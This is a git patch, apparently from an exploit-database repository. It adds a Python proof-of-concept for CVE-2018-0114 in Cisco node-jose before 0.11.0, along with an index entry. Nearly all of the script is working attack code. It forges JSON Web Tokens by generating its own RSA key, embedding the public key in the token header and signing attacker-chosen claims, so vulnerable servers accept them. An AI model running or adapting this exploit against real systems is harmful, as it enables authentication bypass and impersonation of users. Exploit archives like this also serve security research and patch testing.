From ce0c08bf9304f604d8e129d777d9f8356b617a98 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 22 Mar 2018 05:01:48 +0000 Subject: [PATCH] DB: 2018-03-22 1 changes to exploits/shellcodes Cisco node-jos < 0.11.0 - Re-sign Tokens --- exploits/multiple/webapps/44324.py | 88 ++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 89 insertions(+) create mode 100755 exploits/multiple/webapps/44324.py diff --git a/exploits/multiple/webapps/44324.py b/exploits/multiple/webapps/44324.py new file mode 100755 index 000000000..b6046bef2 --- /dev/null +++ b/exploits/multiple/webapps/44324.py @@ -0,0 +1,88 @@ +import base64 +import urllib +import rsa +import sys + +#zi0Black + +''' +POC of CVE-2018-0114 Cisco node-jose <0.11.0 + +Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram) + +Mail: a.cappa@zioblack.xyz +Site: https://zioblack.xyz + +A special thanks to Louis Nyffenegger, the founder of PentesterLab, for all the help he provided to allow me to write this script. + +Mail: louis@pentesterlab.com +Site: https://pentesterlab.com + +''' + +def generate_key (key_size): + #create rsa priv & public key + print ("[+]Creating-RSA-pair-key") + (public_key,private_key)=rsa.newkeys(key_size,poolsize=8) + print ("\t[+]Pair-key-created") + return private_key, public_key + +def to_bytes(n, length, endianess='big'): + h = '%x' % n + s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex') + return s if endianess == 'big' else s[::-1] + +def generate_header_payload(payload,pubkey): + #create header and payload + print ("[+]Assembling-the-header-and-the-payload") + xn = pubkey.n + xe = pubkey.e + n=base64.urlsafe_b64encode(to_bytes(xn,sys.getsizeof(xn),'big')) + e=base64.urlsafe_b64encode(to_bytes(xe,sys.getsizeof(xe),'big')) + headerAndPayload = base64.b64encode('{"alg":"RS256",' + '"jwk":{"kty":"RSA",' + '"kid":"topo.gigio@hackerzzzz.own",' + '"use":"sig",' + '"n":"'+n+'",' + '"e":"'+e+'"}}') + headerAndPayload=headerAndPayload+"."+base64.b64encode(payload) + headerAndPayload = headerAndPayload.encode('utf-8').replace("=","") + print ("\t[+]Assembed") + return headerAndPayload + +def generate_signature (firstpart,privkey): + #create signature + signature = rsa.sign(firstpart,privkey,'SHA-256') + signatureEnc = base64.b64encode(signature).encode('utf-8').replace("=", "") + print ("[+]Signature-created") + return signatureEnc + +def create_token(headerAndPayload,sign): + print ("[+]Forging-of-the-token\n\n") + token = headerAndPayload+"."+sign + token = urllib.quote_plus(token) + return token + + +if(len(sys.argv)>0): + payload = str(sys.argv[1]) + key_size = sys.argv[2] +else: + payload = 'somthings' + +banner=""" + _____ __ __ ______ ___ ___ __ ___ ___ __ __ _ _ + / ____| \ \ / / | ____| |__ \ / _ \ /_ | / _ \ / _ \ /_ | /_ | | || | + | | \ \ / / | |__ ______ ) | | | | | | | | (_) | ______ | | | | | | | | | || |_ + | | \ \/ / | __| |______| / / | | | | | | > _ < |______| | | | | | | | | |__ _| + | |____ \ / | |____ / /_ | |_| | | | | (_) | | |_| | | | | | | | + \_____| \/ |______| |____| \___/ |_| \___/ \___/ |_| |_| |_| by @zi0Black +""" + +if __name__ == '__main__': + print (banner) + (privatekey,publickey) = generate_key(key_size) + firstPart = generate_header_payload(payload,publickey) + signature = generate_signature(firstPart,privatekey) + token = create_token(firstPart,signature) + print(token) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 03d05dd69..50b1367f6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -39029,3 +39029,4 @@ id,file,description,date,author,type,platform,port 44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware, 44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware, 44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php, +44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,